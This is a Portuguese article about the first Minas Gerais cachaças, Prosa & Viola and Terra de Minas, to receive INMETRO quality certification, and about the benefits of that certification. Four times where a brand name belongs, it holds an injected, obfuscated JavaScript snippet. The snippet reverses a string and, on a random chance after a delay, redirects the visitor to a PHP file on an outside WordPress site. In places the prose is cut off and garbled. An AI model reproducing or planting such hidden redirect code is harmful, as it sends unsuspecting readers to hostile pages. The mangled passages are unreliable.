Cachaças certificadas pelo INMETRO

Prosa & Viola e Terra de Minas: 1as cachaças de Minas a receberem o selo de qualidade INMETRO

Momento único para o setor de cachaças, a certificação de qualidade INMETRO é um importante passo para o reconhecimento internacional e valorização da cachaça, enquanto produto artesanal de qualidade.

Em Dezembro de 2006, o organismo de certificação de produtos do Instituto de Pesos e Medidas do Estado de São Paulo (Ipem-SP) certificou oficialmente as primeiras cachaças – Prosa & Viola e Terra de Minas – através do programa de certificação voluntária. Acreditado pelo Inmetro para tal atividade, o organismo certificador do Ipem-SP atesta, de maneira imparcial, que o produto está conforme as exigências legais, especificações técnicas e normas oficiais. A certificação, portanto, é um reconhecimento público da qualidade do produto.

As cachaças $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos&c=42″>TERRA DE MINAS, produzidas pela Agro-Indústria Prosa e Viola Ltda, no município mineiro de Morro da Garça (circuito turístico Guimarães Rosa – região central do Estado), são as primeiras genuinamente mineiras a receberem a certificação, tendo sido atendidas satisfatoriamente, todas as exigências legais, o que foi atestado em duas auditorias do OCIPEM-SP em suas instalações.

A cachaça $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos&c=42″>TERRA DE MINAS é envelhecida um ano em tonel de jequitibá e foi desenvolvida especialmente para drinques e coquetéis. Ambas tem graduação alcoólica de 40° GL, e são produzidas de forma artesanal, utilizando princípios ecologicamente corretos e toda a tecnologia necessária para garantir ao consumidor um produto rigorosamente dentro das normas e parâmetros legais.

O processo de certificação começou em setembro de 2006, quando o Ipem-SP deu início às auditorias do processo produtivo através de visitas ao alambique e às análises das amostras de cachaça coletadas na fábrica e no comércio. Nessa etapa foram verificados os aspectos de todas as etapas de produção da cachaça, como também os controles necessários para evitar a contaminação do produto, diretamente ligados às condições de limpeza e higiene, que contribuem para a garantia de qualidade e regularidade da produção.

Todo o plantio de cana-de-açúcar das cachaças $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos&c=42″>TERRA DE MINAS, que é feito na própria fazenda, foi avaliado pelos técnicos que analisaram todos os registros de manejo do canavial, incluindo utilização de fertilizantes e outros insumos. A intenção é de garantir que haja qualquer tipo de contaminação no produto final.

Além da avaliação do processo de produção em si, a certificação contempla os aspectos ambientais visando garantir a preservação das fontes de água potável, cursos de rios e áreas de mananciais. Foi verificado que a produção das cachaças $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos&c=42″>TERRA DE MINAS possuem práticas adequadas com relação ao descarte de resíduos da produção, como o vinhoto que é 100% aproveitado na lavoura, como adubo natural e como fonte de alimentação para o gado. Além disso, a empresa reutiliza o bagaço da cana para o aquecimento da fornalha, deixando de utilizar madeira nativa. A preocupação ambiental é tão grande que a empresa contratou um biólogo para desenvolver um projeto de reflorestamento que visa a reconstituição da flora local.

Outro aspecto verificado pelos auditores se refere às condições de trabalho dos empregados, o cumprimento das leis trabalhistas, a utilização de equipamentos de proteção individual e a existência de locais adequados para refeição.

A empresa, que desde o lançamento da to importante, que nos deixa muito felizes. Essa conquista é fruto de muito trabalho, estudos e grande dedicação”, observa o produtor, José Antônio de Freitas Souza.


BENEFÍCIOS DA CERTIFICAÇÃO

A certificação voluntária vem para acrescentar valores reais à cachaça. É através dela que a empresa poderá atestar que seu produto está em conformidade com as normas técnicas exigidas pela Portaria Inmetro 126 de 24/06/2005, recebendo para isso o Certificado de Avaliação da Conformidade.

Os produtos desta empresa passam então, a usar a marca do Inmetro e do Ipem-SP. +É a demonstração formal ao mercado do compromisso que a organização assume com relação às necessidades e às expectativas dos clientes, sejam consumidores ou importadores+. Além disso, é uma garantia de segurança e um enorme fator de diferenciação do produto perante o mercado e a concorrência.

Para exportar, é fundamental oferecer um produto de qualidade, pois o mercado internacional é muito exigente. Bom marketing, rótulos marcantes e garrafas sofisticadas são importantes, mas não é o bastante para validar as estratégias de internacionalização do produto.

A certificação reconhecida pelo Sistema Brasileiro de Avaliação da Conformidade (SBAC) faz parte dessas estratégias porque agrega outros benefícios.

Entre eles, destacam-se:

  • Valorização da marca do produto
  • Melhoria da imagem da empresa produtora da cachaça
  • Aumento da confiança do consumidor no produto
  • Diferenciação frente aos concorrentes
  • Redução de custos
  • Acesso a novos mercados no país e no exterior
  • Combate à concorrência desleal entre as empresas produtoras de cachaça

Evidenciar o atendimento a requisitos como saúde, segurança do consumidor, preservação do meio ambiente e responsabilidade social, passaram a ser fatores determinantes no momento das negociações.

Como pré-requisito para o processo de certificação, a empresa produtora de cachaça deve estar com seu produto registrado no Ministério da Agricultura, Pecuária e Abastecimento (MAPA) e estar com a situação regularizada em relação às legislações vigentes no país.

PARCERIAS IMPORTANTES

Apesar dos reais benefícios tanto para o produtor, e consequentemente para o consumidor final, além de incentivar os cuidados com o meio ambiente, as Micro e Pequenas Empresas e produtores rurais, organizados em Arranjos Produtivos Locais ou articulados em ações coletivas encontram dificuldades quanto aos custos envolvidos no processo de certificação.

Com o objetivo de promover a certificação das cachaças de alambique, normalmente produzidas por essas pequenas empresas, que integram a Política Industrial, Tecnológica e de Comércio Exterior (PITCE) do governo federal, o Inmetro e o Sebrae firmaram acordo para facilitar a entrada desses produtores no processo.

Ações como certificação em grupo ou Bônus Certificação, concedido pelo Sebrae e Inmetro, diminuem significativamente os custos da certificação para o produtor. O projeto visa auxiliar o setor a melhorar a aceitação da cachaça no exterior. Lá, a bebida é muito valorizada, principalmente na Europa, Estados Unidos e Canadá, mas os importadores querem ter segurança total de que o produto não apresentará presença de alguns contaminadores em teores acima aos tolerados pelo organismo humano, que também está descrito na Portaria Inmetro126/2005.

O Brasil exporta, atualmente, 11 milhões de litros da bebida por ano. O projeto investirá R$5 milhões para facilitar o acesso dos empresários do setor à certificação, um esforço de longo prazo que une entidades tecnológicas e o setor produtivo.

Entre as coberturas do Bônus estão as despesas com auditorias, ensaios, inspeções e viagens. Também poderão ser incluídas despesas relativas à manutenção do certificado durante 3 anos.

Os interessados podem acessar os detalhes do programa assim como outras informações importantes através do dos sites www.sebrae.com.br e www.inmetro.gov.br.

PRODUTO CACHAÇA – PARTICULARIDADES IMPORTANTES

A cachaça vem marcando presença na vida dos brasileiros ao longo de quatro séculos através da literatura, da culinária, da religião, da língua, das festas populares e da economia nacional, tornando-se, ao longo do tempo, uma bebida originalmente brasileira.

Hoje, tanto interna quanto externamente, a cachaça é responsável por 7% do mercado de bebidas no país, segundo o próprio Sebrae de Minas.

Mesmo com mudanças marcadas pela modernidade, realizadas na estrutura do produto, como embalagens modernas, conteúdos envelhecidos em tonéis de jequitibá e carvalho, rótulos diferenciados, entre muitas outras, a Cachaça do Brasil encontra na certificação voluntária a base necessária para alavancar o setor quanto à comercialização do produto engarrafado, que é o que realmente agrega valor e rentabilidade para as empresas.

A idéia do segmento é diminuir cada vez mais as vendas a granel, uma vez que esse tipo de transação não tem sido vantajosa nem para o produtor nem para o produto em si, uma vez que não tem foco no cultivo da marca.

Além disso, existem indícios de que alguns engarrafadores estrangeiros adicionam outros produtos à cachaça colocando a etiqueta “original do Brazil” para comercialização, o que acaba por afetar a imagem do produto.

Outro fator importante é o avanço das preocupações com a saúde. Com esse quadro, é possível dizer que, cada vez mais, o consumidor médio estará optando por produtos com qualidade comprovada, com controle mais rigoroso. Carbamato de Etila, Metanol, Acroleína, N-Butanol, Cobre, Chumbo e Arsênio estão entre as substâncias analisadas nos ensaios realizados durante o processo e certificação. A presença desses análitos, acima do permitido pela Organização Mundial da Saúde, é prejudicial à saúde humana.

O Carbamato de Etila, resultado da fermentação da cana, tem potencial cancerígeno; o Metanol, conseqüência da degradação da pectina presente na cana-de-açúcar, tem alta toxicidade; a Acroleína, formada durante o processo de fermentação alcoólica, cuja reação é catalisada pela ação de leveduras, é também cancerígena; o N-Butanol é proveniente de contaminação bacteriana no processo de fermentação; o Cobre, formado a partir do processo de destilação, onde os equipamentos são feitos desse material, é de difícil eliminação e ao longo do tempo acentua sua toxicidade; o Chumbo e o Arsênio ocorrem devido a contaminações nos equipamentos, solo e água, e acumulam também no organismo do homem, além de o Arsênio ter efeito cancerígeno.

A certificação voluntária, neste caso, está se tornando a forma mais efetiva para a superação de todas essas dificuldades, com a retirada total dessas substâncias ou sua diminuição a níveis aceitáveis pelo organismo humano, como contribuição para o fortalecimento do setor.

Outras Informações:
Cachaça Prosa & Viola e Terra de Minas
Gerencia Comercial: Daniela Vilaça – +55 31 8709-2266
E mail: www.prosaeviola.com.br

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